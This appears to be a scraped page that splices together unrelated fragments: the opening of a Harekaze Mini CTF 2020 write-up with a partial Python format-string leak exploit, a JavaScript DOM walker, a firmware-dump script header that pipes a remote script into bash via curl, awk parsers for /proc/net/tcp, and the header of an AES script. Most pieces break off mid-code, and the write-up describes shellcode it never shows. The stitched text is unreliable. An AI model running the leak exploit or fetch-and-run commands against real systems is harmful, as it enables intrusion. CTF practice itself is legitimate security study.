Executable and Linkable Format (ELF) is the default binary format on Linux-based systems.
I played Harekaze Mini CTF 2020 for about 3 hours this weekend. The pwn challenges were nice (I especially enjoyed nm-game-extreme). Here are some short writeups.
The program just tells you to provide shellcode that will execute execve("/bin/sh", NULL, NULL). It gives you the address of the "/bin/sh" string, so you just create shellcode to do the job and send it:
#!/usr/bin/env python3
from pwn import *
import struct
import socket
s = socket.socket()
s.connect(('127.0.0.1', 1337))
r = s.recv(1024)
# format-string leak: each %p makes the server print one pointer-sized value in hex
s.send(b"%p,%p,%p\n")
# keep reading until the comma-separated leak has arrived
while b',' not in r:
    r += s.recv(1024)
# the second leaked value points 9 bytes past the start of our input buffer
start_buf = int(r.split(b',')[1], 16) - 9
function walk(node) {
// I stole this function from here:
// http://is.gd/mwZp7E
var child, next;
var tagName = node.tagName ? node.tagName.toLowerCase() : "";
// leave form fields alone so their values are not rewritten
if (tagName == 'input' || tagName == 'textarea') {
return;
}
// recurse into the children (read nextSibling first, since walk() may detach child)
child = node.firstChild;
while (child) {
next = child.nextSibling;
walk(child);
child = next;
}
}
An analysis of Censys Public Scan 20180807 (port 22 only) to estimate the number of servers potentially vulnerable to the recent libssh bug.
#!/bin/bash
# this tool will automate firmware extraction and unpacking using FT232R-type adaptors (like BusPirate) and a SOIC clip placed on a chip to dump
# install the necessary software:
#$ sudo apt install flashrom binwalk || echo 'git clone?'
# pump up binwalk with additional packages and libraries
#$ bash <(curl -s https://raw.githubusercontent.com/devttys0/binwalk/master/deps.sh)
# place the clip on the chip, connect it to the adaptor, which should be connected to your PC (with drivers installed) and launch the script:
# chip => clip => adaptor => PC => script
# Gawk version (strtonum is a gawk extension)
# Remote: $3 is rem_address, little-endian hex IPv4 followed by ":" and a hex port
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($3,index($3,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($3,i,2))}{print x":"strtonum("0x"substr($3,index($3,":")+1,4))}'
# Local: $2 is local_address, same encoding
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($2,index($2,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($2,i,2))}{print x":"strtonum("0x"substr($2,index($2,":")+1,4))}'
# No Gawk: a hand-rolled hextodec() stands in for strtonum on plain awk/mawk
# Local
grep -v "rem_address" /proc/net/tcp | awk '
function hextodec(str, ret, n, i, k, c) {
  ret = 0; n = length(str)
  for (i = 1; i <= n; i++) { c = tolower(substr(str, i, 1)); k = index("0123456789abcdef", c) - 1; ret = ret * 16 + k }
  return ret
}
{ x = hextodec(substr($2, index($2, ":") - 2, 2))
  for (i = 5; i > 0; i -= 2) x = x "." hextodec(substr($2, i, 2))
  print x ":" hextodec(substr($2, index($2, ":") + 1, 4)) }'
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# (c) 2020 Bernd Busse
#
"""Implementation of AES as used by https://aesencryption.net."""
import base64
import sys